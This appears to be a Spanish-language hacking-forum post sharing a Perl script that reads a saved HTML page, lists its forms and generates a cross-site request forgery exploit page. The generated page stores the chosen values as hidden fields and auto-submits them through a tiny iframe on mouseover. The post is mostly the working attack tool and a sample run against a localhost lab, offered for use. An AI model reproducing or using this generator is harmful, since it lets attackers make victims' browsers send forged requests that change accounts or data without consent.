Autor
para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.
Código
#!usr/bin/perl
#CSRF T00l (C) Doddy Hackman 2011
use HTML::Form;
use URI::Split qw(uri_split);
installer();
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
unless(-f $_[0]) {
print "\n[-] File Not Found\n";
copyright();
}
print "\n[+] File to parse : ".$_[0]."\n\n";
open(FILE,$_[0]);
my $words = join q(),<FILE>;
close(FILE);
my @testar = HTML::Form->parse($words,"/");
$count = 0;
foreach my $test(@testar) {
$count++;
print "\n\n -- == Form $count == --\n\n";
if ($test->attr(name) eq "") {
print "[+] Name : No Found"."\n";
} else {
print "[+] Name : ".$test->attr(name)."\n";
}
print "[+] Action : ".$test->action."\n";
print "[+] Method : ".$test->method."\n";
print "\n-- == Input == --\n\n";
@inputs = $test->inputs;
print "Type\t\tName\t\tValue\n";
foreach $in(@inputs) {
print $in->type."\t\t";
print $in->name."\t\t";
print $in->value."\t\t\n";
}
}
print "\n\n[+] Form to generate : ";
chomp(my $op = <stdin>);
if ($op ne "") {
$op--;
my $probar = (HTML::Form->parse($words,"/"))[$op];
my $action = ver($words,$op);
my $fin = nombre($action).".html";
savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
@input = $probar->inputs;
foreach $in(@input) {
print "\n[+] Value of the ".$in->name." : ";
chomp(my $val = <stdin>);
savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
}
my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
";
savefile($final,$fin);
print "\n\n[+] CSRF Exploit Generated\n\n";
print "[+] To can see in logscsrf/".$fin."\n\n";
}
}
sub ver {
my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
my $action = $probar->action;
my $co = $action;
if ($action eq "" or $action eq "/"){
print "\n\n[+] Action : ";
chomp(my $action = <stdin>);
return $action;
} else {
return $co;
}
}
sub installer {
unless (-d "logs_csrf/") {
mkdir("logs_csrf/","777");
}}
sub nombre {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
return $auth;
}
sub savefile {
open (SAVE,">>logs_csrf/".$_[1]);
print SAVE $_[0]."\n";
close SAVE;
}
sub sintax {
print "\n[+] sintax : $0 <file>\n";
}
sub head {
print "\n\n -- == CSRF T00l == --\n\n";
}
sub copyright {
print "\n\n -- == Doddy Hackman 2011 == --\n\n";
exit(1);
}
# ¿ The End ?
Ejemplo de uso
Código:
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\CSRF Tool>tool.pl read.txt
-- == CSRF T00l == --
[+] File to parse : read.txt
-- == Form 1 == --
[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET
-- == Input == --
Type Name Value
text ver
password veras
submit control Agregar
-- == Form 2 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
Type Name Value
text ac
submit ee aaa
[+] Form to generate : 1
[+] Value of the ver : aaa
[+] Value of the veras : aaa
[+] Value of the control : aaa
[+] CSRF Exploit Generated
[+] To can see in logscsrf/localhost.html
-- == Doddy Hackman 2011 == --
En línea
